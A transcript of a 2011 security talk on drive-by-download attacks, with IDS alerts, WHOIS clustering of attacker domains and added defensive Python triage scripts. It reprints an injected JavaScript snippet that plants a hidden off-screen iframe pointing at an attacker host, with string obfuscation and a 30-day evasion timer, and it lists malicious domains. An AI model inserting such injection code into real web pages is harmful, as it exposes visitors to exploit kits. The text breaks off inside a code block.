Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure

Vladimir B. Kropotov
TBINFORM (TNK-BP Group)
Drive-By-Download
• Attackers distribute malware by "poisoning" legitimate websites
• The attacker injects malicious iframes into the site's HTML content
• Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. are used by the attacker
You just want information about insurance, nothing more, but…
What does it look like?
[Diagram: a PC connected to the Internet loads a known (legitimate) server carrying the injected iframe. The iframe pulls in an intermediate server controlled by the attacker, which collects OS, browser and plugin information from the PC and signals "host ready". An exploit server controlled by the attacker then delivers the exploit, and a malware server controlled by the attacker delivers the malware.]
How do we find it?
IDS alert: a PDF is fetched from an image directory under hash-named path components.
Date/Time           2011-08-05 10:44:53 YEKST
Tag Name            PDF_XFA_Script
Observance Type     Intrusion Detection
Cleared Flag        false
Target IP Address   10.X.X.X
Target Object Name  9090
Target Object Type  Target Port
Target Service      unknown
Source IP Address   10.X.X.Y
SourcePort Name     2359
compressed          zlib
server              total.logeater.org
URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
DOES THE USER NEED IT??
First indicators (in chronological order)

Date/Time   2011-07-26 11:24:37
Tag Name    PDF_XFA_Script
arg         3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed  zlib
server      mamjhvbw.dyndns.pro
URL         /ghqlv3ym/

Date/Time   2011-08-09 10:17:14
Tag Name    PDF_XFA_Script
arg         host=http://inaptly.in&b=486def4
compressed  gzip
server      inaptly.in
URL         /jb/lastrger.php

Date/Time   2011-08-14 14:06:28
Tag Name    PDF_XFA_Script
arg         host=http://oligist.in&b=486def4
compressed  gzip
server      oligist.in
URL         /jb/lastrger.php

Date/Time   2011-08-16 13:24:44
Tag Name    ActiveX_Warning
clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server      skipetar.in
URL         /jb/pda.js

Date/Time   2011-08-18 19:00:13
Tag Name    ActiveX_Warning
clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server      e1in.in
URL         /stat/574a353789f/pda.js

Date/Time   2011-08-18 19:00:13
Tag Name    PDF_XFA_Script
arg         host=http://e1in.in/stat&u=root
compressed  zlib
server      e1in.in
URL         /stat/574a353789f/lastrger.php
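Added example (not part of the talk): a small Python triage script that parses alert records in the key/value form shown above and flags the features the analyst keyed on: XFA-scripted PDFs fetched from hash-named paths, the CLSID from the ActiveX_Warning alerts, the pda.js / lastrger.php script names, and the host= callback argument. The sample records are constructed from the slides' indicators plus one made-up benign fetch; the field list, the regexes, the "HTTP_Get" tag of the control record and the reason strings are my assumptions, not the IDS vendor's.

```python
import re
from typing import Dict, List

# Constructed sample in the key/value shape the talk's IDS alerts use. The
# first three records reproduce indicators shown on the slides; the fourth is
# a made-up benign fetch added as a control.
SAMPLE_ALERTS = """\
Date/Time 2011-08-05 10:44:53
Tag Name PDF_XFA_Script
Target IP Address 10.X.X.X
Target Object Name 9090
Source IP Address 10.X.X.Y
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js

Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-09 10:20:00
Tag Name HTTP_Get
server www.example-insurer.test
URL /policies/terms.pdf
"""

# Field names as they appear on the slides; some carry a leading ':'.
FIELD_RE = re.compile(
    r"^:?(Date/Time|Tag Name|Target IP Address|Target Object Name|Target Object Type"
    r"|Target Service|Source IP Address|SourcePort Name|compressed|server|URL|arg|clsid)"
    r"\s+(.*)$"
)


def parse_alerts(text: str) -> List[Dict[str, str]]:
    """Split a blank-line separated key/value dump into one dict per alert."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(current)
    return records


# Heuristics, each tied to something visible in the talk's alerts.
HASH_DIR = re.compile(r"/[0-9a-f]{32}/")              # hash-named directory in the path
KIT_PATHS = re.compile(r"/(pda\.js|lastrger\.php)$")  # script names seen on the kit hosts
JAVA_CLSID = "CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"   # CLSID from the ActiveX_Warning alerts


def triage(record: Dict[str, str]) -> List[str]:
    """Return the reasons an alert deserves a look (empty list = nothing notable)."""
    reasons: List[str] = []
    tag = record.get("Tag Name", "")
    url = record.get("URL", "")
    if tag == "PDF_XFA_Script" and url.lower().endswith(".pdf") and HASH_DIR.search(url):
        reasons.append("XFA-scripted PDF served from a hash-named path")
    if tag == "ActiveX_Warning" and record.get("clsid", "").upper() == JAVA_CLSID:
        reasons.append("Java plug-in CLSID probe")
    if KIT_PATHS.search(url):
        reasons.append("kit script path")
    if record.get("arg", "").startswith("host="):
        reasons.append("landing page passes a host= callback")
    return reasons


def indicator_hosts(records: List[Dict[str, str]]) -> List[str]:
    """Servers worth blocking or pivoting on: every host with at least one reason."""
    return sorted({r.get("server", "") for r in records if triage(r)})


if __name__ == "__main__":
    alerts = parse_alerts(SAMPLE_ALERTS)
    for rec in alerts:
        print(rec.get("Date/Time"), rec.get("server"), triage(rec))
    print("hosts:", indicator_hosts(alerts))
```

The point of the control record is that a PDF fetch on its own is not an indicator; it is the XFA script plus the hash-named path, or the kit script names and the host= argument, that separate the exploit-kit traffic from ordinary browsing.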
Example: o-strahovanie.ru (Sep 02)
The injected script as found on the page, re-indented (the original is one run-on line). Cookie record observed for www.o-strahovanie.ru/: if_ik 1315314771 (1600429305625633310239293001403230174358*). The value 1315314771 is a Unix timestamp, 2011-09-06 13:12:51 UTC, the moment the marker was written.

  / ============ bbb ============
  document.xmlSettings.if_ik=false;
  if(window.localStorage){
    if(window.localStorage.if_ik){
      if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time())
        document.xmlSettings.if_ik=true;
    }else document.xmlSettings.if_ik=true;
  }else{// 4 osel
    if(document.xmlSettings.getCookie('if_ik')){
      if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time())
        document.xmlSettings.if_ik=true;
    }else document.xmlSettings.if_ik=true;
  }
  if(document.xmlSettings.if_ik){
    if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
    else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{expires:(document.xmlSettings.time()+86400*365)});
    document.xmlSettings.iframe=document.createElement('iframe');
    document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
    document.body.appendChild(document.xmlSettings.iframe);
    document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
  }

What it does: the marker if_ik (kept in localStorage where available, otherwise in a cookie; the comment "4 osel", "for the donkey", is Russian slang for the Internet Explorer branch) records when the visitor was last served the iframe. The 1x1 iframe, positioned 5000px off-screen, is inserted only if there is no marker or the marker is older than 2592000 seconds (30 days), so a second visit from the same browser within 30 days shows a clean page. The concatenated string hides the target from simple pattern matching and resolves to:

  iframe.src='http://disregarding.in/xtqd2/08.php'
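Added example (my code, not the talk's): a Python helper for the analysis the slides do by hand. It folds the 'htt'+'p://'+… concatenation back into the real iframe URL, reads the re-injection window and the off-screen styling out of the script, and reproduces the if_ik decision so the 30-day suppression is explicit. The embedded script is the slide's localStorage branch, re-indented; the function names and the regexes are mine.

```python
import re
from datetime import datetime, timezone
from typing import List, Optional

# Constructed excerpt: the o-strahovanie.ru injection from the slide, reduced
# to the localStorage branch and the iframe insertion, re-indented but
# otherwise verbatim.
INJECTED_JS = r"""
document.xmlSettings.if_ik=false;
if(window.localStorage){
  if(window.localStorage.if_ik){
    if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time())
      document.xmlSettings.if_ik=true;
  }else document.xmlSettings.if_ik=true;
}
if(document.xmlSettings.if_ik){
  if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
  document.xmlSettings.iframe=document.createElement('iframe');
  document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
  document.body.appendChild(document.xmlSettings.iframe);
  document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
}
"""

CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")          # 'a'+'b'
IFRAME_SRC = re.compile(r"\.iframe\.src\s*=\s*'([^']+)'")    # assignment to the iframe src
THROTTLE = re.compile(r"\+\s*(\d+)\s*<\s*document\.xmlSettings\.time\(\)")
CSS_TEXT = re.compile(r"cssText\s*=\s*'([^']*)'")


def fold_concats(js: str) -> str:
    """Collapse 'a'+'b'+'c' chains into one literal; repeat until nothing changes."""
    while True:
        js, n = CONCAT.subn(lambda m: "'" + m.group(1) + m.group(2) + "'", js)
        if n == 0:
            return js


def iframe_sources(js: str) -> List[str]:
    """Every URL assigned to an iframe src, after string folding."""
    return [m.group(1) for m in IFRAME_SRC.finditer(fold_concats(js))]


def throttle_seconds(js: str) -> Optional[int]:
    """The re-injection window the script compares its marker against."""
    m = THROTTLE.search(js)
    return int(m.group(1)) if m else None


def iframe_is_hidden(js: str) -> bool:
    """True when the iframe is styled so the user cannot see it."""
    m = CSS_TEXT.search(js)
    css = m.group(1).replace(" ", "") if m else ""
    offscreen = "left:-" in css or "display:none" in css or "visibility:hidden" in css
    tiny = "height:1px" in css or "width:1px" in css
    return offscreen or tiny


def will_inject(marker: Optional[str], now: int, window: int) -> bool:
    """Mirror of the if_ik decision: inject when no marker, or marker older than window."""
    if not marker:
        return True
    return int(marker) + window < now


def marker_to_utc(marker: str) -> str:
    """The if_ik value is a Unix timestamp; render it for the incident timeline."""
    return datetime.fromtimestamp(int(marker), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    window = throttle_seconds(INJECTED_JS)
    print("iframe src:", iframe_sources(INJECTED_JS))
    print("window:", window, "seconds =", window // 86400, "days")
    print("hidden:", iframe_is_hidden(INJECTED_JS))
    print("cookie written at", marker_to_utc("1315314771"), "UTC")
    print("re-visit next day injects:", will_inject("1315314771", 1315314771 + 86400, window))
```

Practical caveat: when you re-fetch a suspected page to confirm the injection, use a fresh browser profile or clear localStorage and cookies first; otherwise the marker suppresses the iframe and the site looks clean for the next 30 days.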
Drive-By-Download, o-strahovanie.ru, Sep 02
[Diagram: the same chain. Known server with iframe → intermediate server disregarding.in, which receives the OS/browser/plugin information and the "host ready" signal. NO exploit server and NO malware server answer: no exploit and no payload were delivered.]
Drive-By-Download, o-strahovanie.ru, Sep 12
[Diagram: known server with iframe → intermediate server disregarding.in → exploit server chamberwoman.in / janiculum.in (exploit delivered) → malware server chamberwoman.in / janiculum.in (malware delivered).]
Example: o-strahovanie.ru (WHOIS)
Domain ID:           D5165642-AFIN
Domain Name:         DISREGARDING.IN
Created On:          14-Jul-2011 11:09:59 UTC
Registrant Name:     Russell Rosario
Registrant Street1:  136 Oakdale Avenue
City:                Winter Haven
Registrant Country:  US
Email:               russellsrosario@teleworm.com
Name Server:         NS1.PRIDES.ME
Name Server:         NS2.PRIDES.ME

Domain Name:         JANICULUM.IN, CHAMBERWOMAN.IN
Created On:          12-Sep-2011 08:14 UTC
Registrant Name:     Russell Rosario

No payload, because no payload requests? Are they looking for customers?

More domains registered to Russell Rosario within the same minute:
Domain Name:         FILTRATED.IN
Created On:          14-Jul-2011 11:09:53 UTC
Sponsoring Registrar: Directi Web Services Pvt. Ltd. (R118-AFIN)
Registrant ID:       TS_16731618
Registrant Name:     Russell Rosario
Registrant Street1:  136 Oakdale Avenue
Registrant City:     Winter Haven
Registrant State/Province: Florida
Registrant Postal Code: 33830
Registrant Country:  US
Registrant Phone:    +1.8635571308
Email:               russellsrosario@teleworm.com

filtrated.in, raptnesses.in, tansies.in (Created On 14-Jul-2011 11:09:56, 11:09:56 and 11:10:03 UTC, as listed on the slide)
 But Sally Doesn't Know…
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical server location by IP address: Romania
• Responsible person (WHOIS registrant): Russell Rosario
• Domains are new
• Domain owner is the same:
Domain Name       Created On                 Registrant Name
irrefutably.in    15-Jul-2011 11:00:21 UTC   Russell Rosario
comprador.in      25-Jul-2011 05:59:54 UTC   Russell Rosario
hyalines.in       29-Jul-2011 09:39:33 UTC   Russell Rosario
suffrago.in       01-Aug-2011 05:35:12 UTC   Russell Rosario
ruritanian.in     01-Aug-2011 05:35:50 UTC   Russell Rosario
20-Jul-2011: Acrobat vulnerabilities reported to the vendor
VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure

ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
Harvesting machine started
Thirteen domains registered to the same person within about two minutes, 16 days after the vendor was notified and well before public disclosure:
Domain Name        Created On                 Registrant Name
microdrili.in      05-Aug-2011 07:13:08 UTC   Russell Rosario
oligist.in         05-Aug-2011 07:13:12 UTC   Russell Rosario
provost.in         05-Aug-2011 07:13:18 UTC   Russell Rosario
vaginalitis.in     05-Aug-2011 07:13:25 UTC   Russell Rosario
kremlinology.in    05-Aug-2011 07:13:35 UTC   Russell Rosario
invariance.in      05-Aug-2011 07:13:41 UTC   Russell Rosario
alleghenian.in     05-Aug-2011 07:13:48 UTC   Russell Rosario
dandifies.in       05-Aug-2011 07:14:06 UTC   Russell Rosario
xenophoby.in       05-Aug-2011 07:14:09 UTC   Russell Rosario
alliaria.in        05-Aug-2011 07:14:15 UTC   Russell Rosario
skipetar.in        05-Aug-2011 07:14:21 UTC   Russell Rosario
inaptly.in         05-Aug-2011 07:15:05 UTC   Russell Rosario
allhallowtide.in   05-Aug-2011 07:15:20 UTC   Russell Rosario
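Added example (not from the talk): a Python script that does the registrant pivot on a table of WHOIS rows like the ones above. It groups domains by registrant and splits each registrant's list into registration bursts (consecutive creations within a short window), which is what makes the "harvesting machine" visible, and it reports how old a domain was when the IDS first saw it. The rows are constructed from the slides' WHOIS excerpts, with one made-up record under a different registrant as a control; the five-minute window and the function names are my assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed from the WHOIS excerpts on the slides (domain, creation time,
# registrant). The last line is a made-up control record under a different
# registrant at the same minute, to show that clustering keys on registrant.
SAMPLE_WHOIS = """\
disregarding.in      14-Jul-2011 11:09:59 UTC  Russell Rosario
filtrated.in         14-Jul-2011 11:09:53 UTC  Russell Rosario
raptnesses.in        14-Jul-2011 11:09:56 UTC  Russell Rosario
tansies.in           14-Jul-2011 11:10:03 UTC  Russell Rosario
irrefutably.in       15-Jul-2011 11:00:21 UTC  Russell Rosario
comprador.in         25-Jul-2011 05:59:54 UTC  Russell Rosario
hyalines.in          29-Jul-2011 09:39:33 UTC  Russell Rosario
suffrago.in          01-Aug-2011 05:35:12 UTC  Russell Rosario
ruritanian.in        01-Aug-2011 05:35:50 UTC  Russell Rosario
microdrili.in        05-Aug-2011 07:13:08 UTC  Russell Rosario
oligist.in           05-Aug-2011 07:13:12 UTC  Russell Rosario
skipetar.in          05-Aug-2011 07:14:21 UTC  Russell Rosario
inaptly.in           05-Aug-2011 07:15:05 UTC  Russell Rosario
allhallowtide.in     05-Aug-2011 07:15:20 UTC  Russell Rosario
janiculum.in         12-Sep-2011 08:14 UTC     Russell Rosario
chamberwoman.in      12-Sep-2011 08:14 UTC     Russell Rosario
unrelated-control.in 05-Aug-2011 07:13:30 UTC  Jane Q. Public
"""

# domain, "DD-Mon-YYYY HH:MM[:SS]", then the registrant name to end of line
ROW = re.compile(r"^(\S+)\s+(\d{2}-[A-Za-z]{3}-\d{4} \d{2}:\d{2}(?::\d{2})?) UTC\s+(.+?)\s*$")

Record = Tuple[str, datetime, str]  # (domain, created_on, registrant)


def parse_whois_table(text: str) -> List[Record]:
    """Parse the table rows; seconds are optional because one slide omits them."""
    rows: List[Record] = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        stamp = m.group(2)
        fmt = "%d-%b-%Y %H:%M:%S" if stamp.count(":") == 2 else "%d-%b-%Y %H:%M"
        rows.append((m.group(1).lower(), datetime.strptime(stamp, fmt), m.group(3)))
    return rows


def burst_registrations(records: List[Record], window: timedelta = timedelta(minutes=5),
                        min_size: int = 2) -> Dict[str, List[List[str]]]:
    """Per registrant, runs of domains where each was created within `window` of the previous."""
    by_registrant: Dict[str, List[Record]] = defaultdict(list)
    for rec in records:
        by_registrant[rec[2]].append(rec)
    bursts: Dict[str, List[List[str]]] = {}
    for who, recs in by_registrant.items():
        recs.sort(key=lambda r: r[1])
        runs: List[List[Record]] = []
        run: List[Record] = [recs[0]]
        for prev, cur in zip(recs, recs[1:]):
            if cur[1] - prev[1] <= window:
                run.append(cur)
            else:
                runs.append(run)
                run = [cur]
        runs.append(run)
        kept = [sorted(r[0] for r in run) for run in runs if len(run) >= min_size]
        if kept:
            bursts[who] = kept
    return bursts


def age_in_days(records: List[Record], domain: str, seen_at_iso: str) -> int:
    """Whole days between registration and the first IDS sighting ('domains are new')."""
    seen = datetime.fromisoformat(seen_at_iso)
    for name, created, _ in records:
        if name == domain.lower():
            return (seen - created).days
    raise KeyError(domain)


if __name__ == "__main__":
    recs = parse_whois_table(SAMPLE_WHOIS)
    for who, runs in burst_registrations(recs).items():
        for run in runs:
            print(f"{who}: {len(run)} domains in one burst: {', '.join(run)}")
    print("skipetar.in was", age_in_days(recs, "skipetar.in", "2011-08-16 13:24:44"),
          "days old at its first alert")
```

Singleton registrations are dropped from the output on purpose: a lone domain under a throwaway name proves little, while four or five created seconds apart under the same name is the registration script itself showing through.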
But maybe someone already knows?
• Spam lists: Aug 19
• AV vendors: Aug 18
• Safe Browsing: Aug 20
• SecurityFocus: Sep 07
Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!

Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site, a GET request handler is established to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure, Sep 14. What to expect?
NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered, most of them named after well-known sites (compare the RZD.RU and KP.RU examples below):
BANER-KLERK.RU, BANK-KLERK.RU, BANNER-KLERK.RU, BLOGS-KLERK.RU, BUH-KLERK.RU, DAILY-KP.RU, FORUM-KLERK.RU, I-OBOZREVATEL.RU, INTERFAX-REGION.RU, IPGEOBASE.IN, ITALIA-NEW.IN, JOB-KLERK.RU, KLERK-BANK.RU, KLERK-BANKIR.RU, KLERK-BIZ.RU, KLERK-BOSS.RU, KLERK-BUH.RU, KLERK-EVEN.RU, KLERK-EVENTS.RU, KLERK-LAW.RU, KLERK-NEW.RU, KLERK-NEWS.RU, KLERK-REKLAMA.RU, KLERK-RU.RU, KLERK-WORK.RU, KLERK2.RU, OBOZREVATEL-RU.RU, OBOZREVATELRU.RU, PRESS-RZD.RU, RZD-RZD.RU, WIKI-KLERK.RU, ***
"New generation"
[Diagram: the chain above (PC → known server with iframe → intermediate server controlled by the attacker, which collects OS/browser/plugin information and signals "host ready" → exploit server and malware server controlled by the attacker), with one addition: the iframe also points at another known server that is NOT controlled by the attacker.]
Attack after public disclosure
• Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
• Physical server location by IP address: international
• Domains registered to different spurious persons
• Domain lifetime ~ time until the domain appears on blacklists
• The iframe refers to the malicious server only for a short period and to a well-known (legitimate) server for almost the whole day (blacklist evasion technique)
• If you don't know the exact malware URL, the site redirects you to the well-known server
• Different types of payload are used: password stealers, Winlockers, and even "normal" (or another ZD) files are installed
Known sites examples (screenshots): RZD.RU (Russian Railways)
Known sites examples (screenshots): KP.RU (Komsomolskaya Pravda, newspaper)
Other examples: EG.RU (newspaper, 263 685 visits per day); svpressa.ru (newspaper, 276 720 visits per day)
Malware examples (screenshots): banks targeted attack
Another news, another phone…
• Legal
• Faked
Malware examples (screenshots)
Script examples (screenshots)
Sample analysis (VirusTotal) (screenshots)
What can we do?
• Patch endpoints
• Tighten Internet filtering (default deny if possible)
• No Internet surfing with admin rights
• See what's happening (continuous monitoring)
• Check that you're well (regular technical audits)
• Educate people
Credits
• Sergey V. Soldatov,
                 TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
                 TBINFORM (TNK-BP Group)
• Wayne Huang,
                 ARMORIZE
THE END

    Vladimir B. Kropotov
Information security analyst
 TBINFORM (TNK-BP Group)

  vbkropotov@tnk-bp.com
    kropotov@ieee.org

 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure. Vladimir B. Kropotov, TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download
    • Hackers distribute malware by "poisoning" legitimate websites
    • Hacker injects malicious iframes into HTML content
    • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used by attacker
    Caption: You just want information about insurance, nothing more, but…
  • 3. What does it look like? (diagram of the chain) PC connected to the Internet → Known server with iframe → Intermediate server controlled by attacker (receives "OS, browser plugins, etc. INFO", answers "Host ready") → Exploit server controlled by attacker (delivers Exploit) → Malware server controlled by attacker (delivers Malware)
  • 4. How we find it?
    Date/Time 2011-08-05 10:44:53 YEKST
    Tag Name PDF_XFA_Script
    Observance Type Intrusion Detection
    Cleared Flag false
    Target IP Address 10.X.X.X
    Target Object Name 9090
    Target Object Type Target Port
    Target Service unknown
    Source IP Address 10.X.X.Y
    SourcePort Name 2359
    :compressed zlib
    :server total.logeater.org
    :URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 5. How we find it? DOES USER NEED IT?? (the same event as on slide 4)
    Date/Time 2011-08-05 10:44:53
    Tag Name PDF_XFA_Script
    Target IP Address 10.X.X.X
    Target Object Name 9090
    Target Object Type Target Port
    Source IP Address 10.X.X.Y
    SourcePort Name 2359
    :compressed zlib
    :server total.logeater.org
    :URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 6. First indicators
    Date/Time 2011-07-26 11:24:37 | Tag Name PDF_XFA_Script | arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750 | compressed zlib | server mamjhvbw.dyndns.pro | URL /ghqlv3ym/
  • 7. First indicators
    Date/Time 2011-08-16 13:24:44 | Tag Name ActiveX_Warning | :clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA | server skipetar.in | URL /jb/pda.js
    Date/Time 2011-08-18 19:00:13 | Tag Name ActiveX_Warning | clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA | server e1in.in | URL /stat/574a353789f/pda.js
  • 8. First indicators
    Date/Time 2011-08-09 10:17:14 | Tag Name PDF_XFA_Script | arg host=http://inaptly.in&b=486def4 | compressed gzip | server inaptly.in | URL /jb/lastrger.php
    Date/Time 2011-08-14 14:06:28 | Tag Name PDF_XFA_Script | :arg host=http://oligist.in&b=486def4 | :compressed gzip | :server oligist.in | :URL /jb/lastrger.php
    Date/Time 2011-08-18 19:00:13 | Tag Name PDF_XFA_Script | arg host=http://e1in.in/stat&u=root | compressed zlib | server e1in.in | URL /stat/574a353789f/lastrger.php
  • 9. First indicators (all six events of slides 6-8 on one timeline)
    2011-07-26 11:24:37 | PDF_XFA_Script | arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750 | compressed zlib | server mamjhvbw.dyndns.pro | URL /ghqlv3ym/
    2011-08-09 10:17:14 | PDF_XFA_Script | arg host=http://inaptly.in&b=486def4 | compressed gzip | server inaptly.in | URL /jb/lastrger.php
    2011-08-14 14:06:28 | PDF_XFA_Script | :arg host=http://oligist.in&b=486def4 | :compressed gzip | :server oligist.in | :URL /jb/lastrger.php
    2011-08-16 13:24:44 | ActiveX_Warning | :clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA | server skipetar.in | URL /jb/pda.js
    2011-08-18 19:00:13 | PDF_XFA_Script | arg host=http://e1in.in/stat&u=root | compressed zlib | server e1in.in | URL /stat/574a353789f/lastrger.php
    2011-08-18 19:00:13 | ActiveX_Warning | clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA | server e1in.in | URL /stat/574a353789f/pda.js
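The pivot that slides 6 through 9 do by hand, as an added Python example that is not part of the talk: the IDS records are parsed, the per-victim hex directory is stripped from the URL, and servers that share a signature and landing-script name (lastrger.php, pda.js) are grouped, so a freshly registered domain is tied to the ones seen earlier. The record text is constructed from the values on slides 6-8.

```python
"""Pivot IDS events on signature and landing-script name to tie newly
registered domains to a campaign already seen (the grouping done by hand on slides 6-9)."""
import re
from collections import defaultdict

# Constructed input: the event records shown on slides 6-8, one blank line apart.
EVENTS_TEXT = """
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28
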